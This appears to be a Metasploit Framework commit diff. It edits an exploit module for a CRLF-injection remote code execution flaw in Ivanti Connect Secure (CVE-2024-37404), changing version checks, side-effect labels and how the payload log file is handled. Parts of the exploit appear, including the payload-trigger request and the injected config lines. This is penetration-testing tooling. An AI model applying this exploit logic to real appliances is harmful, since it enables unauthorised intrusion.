Code review

cdelafuente-r7 · Oct 31, 2024 · f5ac33e · f5ac33e
1 parent 4c1a5c0
commit f5ac33e
Show file tree

Hide file tree

Showing 5 changed files with 19 additions and 12 deletions.
diff --git a/...t-framework.wiki/Definition-of-Module-Reliability-Side-Effects-and-Stability.md b/...t-framework.wiki/Definition-of-Module-Reliability-Side-Effects-and-Stability.md
@@ -59,6 +59,7 @@ Example:
 | CONFIG_CHANGES | Module modifies some config file |
 | IOC_IN_LOGS | Module leaves an indicator of compromise in the log(s) |
 | ACCOUNT_LOCKOUTS | Module may cause an account to lock out |
+| ACCOUNT_LOGOUT | Module may cause an existing valid session to be forced to log out (likely due to restrictions on concurrent sessions)|
 | SCREEN_EFFECTS | Module shows something on the screen that a human may notice |
 | PHYSICAL_EFFECTS | Module may produce physical effects in hardware (Examples: light, sound, or heat) |
 | AUDIO_EFFECTS | Module may cause a noise (Examples: Audio output from the speakers or hardware beeps) |

diff --git a/...entation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_37404.md b/...entation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_37404.md
@@ -1,9 +1,9 @@
 ## Vulnerable Application
 
 This module exploits a CRLF injection vulnerability in Ivanti Connect Secure to
-achieve remote code execution (CVE-2024-37404). Versions prior to 22.7R2.1 and
-22.7R2.2 are vulnerable. Note that Ivanti Policy Secure versions prior to
-22.7R1.1 are also vulnerable but this module doesn't support this software.
+achieve remote code execution (CVE-2024-37404). Versions prior to 22.7R2.1 are
+vulnerable. Note that Ivanti Policy Secure versions prior to 22.7R1.1 are also
+vulnerable but this module doesn't support this software.
 
 Valid administrative credentials are required. A non-administrative user is also
 required and can be created using the administrative account, if needed.

diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb
@@ -82,6 +82,8 @@ module Msf
 IOC_IN_LOGS       = 'ioc-in-logs'
 # Module may cause account lockouts (likely due to brute-forcing).
 ACCOUNT_LOCKOUTS  = 'account-lockouts'
+# Module may cause an existing valid session to be forced to log out (likely due to restrictions on concurrent sessions).
+ACCOUNT_LOGOUT    = 'account-logout'
 # Module may show something on the screen (Example: a window pops up).
 SCREEN_EFFECTS    = 'screen-effects'
 # Module may cause a noise (Examples: audio output from the speakers or hardware beeps).

diff --git a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_37404.rb b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_37404.rb
@@ -23,8 +23,8 @@ def initialize(info = {})
         'Description' => %q{
           This module exploits a CRLF injection vulnerability in Ivanti Connect
           Secure to achieve remote code execution (CVE-2024-37404). Versions
-          prior to 22.7R2.1 and 22.7R2.2 are vulnerable. Note that Ivanti Policy
-          Secure versions prior to 22.7R1.1 are also vulnerable but this module
+          prior to 22.7R2.1 are vulnerable. Note that Ivanti Policy Secure
+          versions prior to 22.7R1.1 are also vulnerable but this module
           doesn't support this software.
 
           Valid administrative credentials are required. A non-administrative
@@ -57,7 +57,7 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, ACCOUNT_LOGOUT]
         }
       )
     )
@@ -172,7 +172,7 @@ def check
       return CheckCode::Detected("Version number not found: #{e}")
     end
 
-    unless version < Rex::Version.new('22.3R2')
+    unless version < Rex::Version.new('22.7R2.1')
       return CheckCode::Safe("Version number: #{version}")
     end
 
@@ -292,7 +292,7 @@ def upload_payload
     get_log_filename
   end
 
-  def trigger_payload(log_filename)
+  def trigger_payload
     print_status('Triggering the payload...')
 
     uri = normalize_uri(target_uri.path, '/dana-admin/cert/admincert.cgi')
@@ -313,7 +313,7 @@ def trigger_payload(log_filename)
       #{engine_name} = #{config_section}
       [#{config_section}]
       engine_id = #{engine_name}
-      dynamic_path = /home/runtime/uploadlog/#{log_filename}
+      dynamic_path = /home/runtime/uploadlog/#{@log_filename}
       init = 0
     CONF
     # Expecting no response
@@ -354,13 +354,13 @@ def exploit
     end
 
     begin
-      log_filename = upload_payload
+      @log_filename = upload_payload
     rescue IvantiError => e
       fail_with(Failure::Unknown, "Unable to upload the payload: #{e}")
     end
 
     begin
-      trigger_payload(log_filename)
+      trigger_payload
     rescue IvantiError => e
       fail_with(Failure::Unknown, "Unable to trigger the payload: #{e}")
     end
@@ -415,7 +415,10 @@ def on_new_session(_session)
     begin
       csrf_token = delete_log_file
     rescue IvantiError => e
-      print_warning("Unable to cleanup properly, this will need to be done manually: #{e}")
+      print_warning(
+        "Unable to cleanup properly, the log file ('/home/runtime/uploadlog/#{@log_filename}') "\
+        "will need to be deleted manually: #{e}"
+      )
     end
 
     print_status('Logging the administrator out...')

diff --git a/spec/support/lib/module_validation.rb b/spec/support/lib/module_validation.rb
@@ -55,6 +55,7 @@ def initialize(mod)
       Msf::CONFIG_CHANGES,
       Msf::IOC_IN_LOGS,
       Msf::ACCOUNT_LOCKOUTS,
+      Msf::ACCOUNT_LOGOUT,
       Msf::SCREEN_EFFECTS,
       Msf::AUDIO_EFFECTS,
       Msf::PHYSICAL_EFFECTS